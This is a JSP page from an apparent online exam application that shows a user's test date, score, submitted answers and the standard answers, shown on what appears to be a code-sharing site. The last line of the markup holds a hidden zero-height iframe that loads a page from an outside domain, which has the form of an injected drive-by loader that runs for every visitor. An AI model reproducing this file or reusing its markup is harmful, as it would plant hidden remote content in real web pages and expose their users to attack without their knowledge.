📄 showscore.jsp
字号:
<%@page contentType="text/html" pageEncoding="UTF-8"%><%@page import = "com.eonline.model.*" %><%@ taglib prefix="html" uri="http://struts.apache.org/tags-html" %><% if ((User) request.getSession().getAttribute("userItem") == null) { response.sendRedirect("/index.jsp"); }%><h1>Exam Over!</h1><h3>Your test scores are as following:</h3><br/><h3>date:</h3> ${score.date} <br/><h3>score:</h3>${score.score} <br/><br/><h3>The following are your answers:</h3><h4>${uanswer}</h4><h3>The following are standard answers:</h3><h4>${sanswer}</h4><html:form action="show_score.do" method="POST"> <html:submit value="Show All Score List" ></html:submit></html:form><iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -